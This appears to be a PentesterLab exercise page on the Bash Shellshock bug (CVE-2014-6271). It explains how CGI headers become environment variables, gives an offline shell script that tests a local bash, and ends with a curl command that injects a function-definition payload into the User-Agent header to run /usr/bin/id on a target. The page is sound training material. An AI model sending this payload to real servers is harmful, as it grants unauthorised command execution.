Shellshock
CVE-2014-6271/Shellshock
This exercise covers the exploitation of a Bash vulnerability through a CGI.
Introduction
This course details the exploitation of the vulnerability CVE-2014-6271. This vulnerability impacts the Bourne
Again Shell "Bash". Bash is not usually available through a web application but can be indirectly exposed
through a Common Gateway Interface "CGI".
Fingerprinting
By visiting the application through a proxy (Burp Suite or OWASP ZAP), we can see that multiple URLs are
requested when the page is loaded:
To exploit "Shellshock", we need to find a way to "talk" to Bash. This means finding a CGI that is executed by Bash.
CGIs are commonly written in Python or Perl, but on old servers it is not unusual to find CGIs written in shell or even C.
How do CGIs work?
When you call a CGI, the web server (Apache here) starts a new process and runs the CGI. Here it starts a
Bash process and runs the CGI script.
Apache needs to pass information about the request to the CGI script. To do so, it uses environment variables,
which are available inside the CGI script. This lets Apache pass every header (amongst other
information) to the CGI: the header name is upper-cased, dashes become underscores, and the result is prefixed
with HTTP_. If you have an HTTP header named Blah in your request, you will have an environment
variable named HTTP_BLAH available in your CGI.
The vulnerability
Here, we are going to focus on the first version of the vulnerability, but many more vulnerabilities in the same
part of Bash have been found since: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186,
CVE-2014-7187...
The source of the issue is that Bash imports shell function definitions from its environment variables: a variable
whose value starts with `() {` is parsed as a function body when Bash starts. In the first version of the vulnerability,
Bash kept parsing past the closing brace, so any command appended after the function definition is executed as soon
as Bash starts, before the CGI script itself runs.
You can quickly test the header-to-environment mapping by replacing the call to `uptime` with a call to `env` in the
CGI. If you then request this script with an arbitrary header, you should see it printed in the page.
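The two mechanisms above, the HTTP_* environment mapping from "How do CGIs work?" and the function-definition parsing that Shellshock abuses, as one added shell example that runs offline without the lab. This is not PentesterLab's code and not the exercise's real CGI: the CGI is a constructed stand-in (with `env` in place of `uptime`, as the text suggests), the header names and values are constructed, and whether the check reports `vulnerable` or `patched` depends on the bash installed on the machine running it.

```shell
#!/bin/sh
# Added example, not PentesterLab's code.  Emulates how a web server hands
# request headers to a CGI through environment variables, then sends the
# Shellshock test string down that same path to see whether the bash on this
# host still executes commands appended to an exported function definition
# (CVE-2014-6271).  All header names and values below are constructed.

BASH_BIN=$(command -v bash || true)   # empty if this host has no bash

# Header name -> CGI variable name, as Apache builds it (RFC 3875 meta-variables):
# upper-cased, '-' turned into '_', prefixed with HTTP_.  "Blah" -> HTTP_BLAH.
cgi_env_name() {
    printf 'HTTP_%s\n' "$1" | tr 'a-z' 'A-Z' | tr '-' '_'
}

# Constructed stand-in for the exercise's CGI: uptime swapped for env so that
# every request header shows up in the response body.
CGI_SOURCE='
echo "Content-Type: text/plain"
echo
env
'

# Run a CGI the way the web server would: each "Name: value" argument is
# exported under its HTTP_* name, then the script runs with that environment.
# Everything happens in a subshell so the caller's environment stays clean.
run_cgi() {
    (
        src=$1
        shift
        for hdr in "$@"; do
            name=${hdr%%:*}
            value=${hdr#*: }
            export "$(cgi_env_name "$name")=$value"
        done
        "${BASH_BIN:-sh}" -c "$src"
    )
}

# Fingerprinting step from the text: does a header named Blah come back as
# HTTP_BLAH in the page?
header_seen_by_cgi() {
    run_cgi "$CGI_SOURCE" "Blah: hello-from-request" | grep '^HTTP_BLAH='
}

# The vulnerability: the header value is a function definition followed by a
# command.  An unpatched bash runs "echo vulnerable" while importing its
# environment, i.e. before the CGI's first line executes, so the word appears
# ahead of the Content-Type header.  A patched bash treats the value as an
# ordinary string and the output starts normally.
shellshock_check() {
    [ -n "$BASH_BIN" ] || { echo bash-not-found; return 0; }
    out=$(run_cgi "$CGI_SOURCE" 'User-Agent: () { :;}; echo vulnerable' 2>/dev/null)
    case $out in
        vulnerable*) echo vulnerable ;;
        *)           echo patched ;;
    esac
}

echo "CGI saw:            $(header_seen_by_cgi)"
echo "bash on this host:  $(shellshock_check)"
```

Against the real target the same value simply goes into a request header, for example `curl -H 'User-Agent: () { :;}; echo; /usr/bin/id' http://target/cgi-bin/<script>` (the path is an assumption; the exercise does not give it here). The extra `echo;` matters: it emits the empty line Apache expects between the CGI's headers and its body, and without it Apache answers with a 500 instead of the command output.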
PentesterLab: Learn Web App Pentesting! https://pentesterlab.com/exercises/cve-2014-62...
1 of 2 2020-04-02 12:11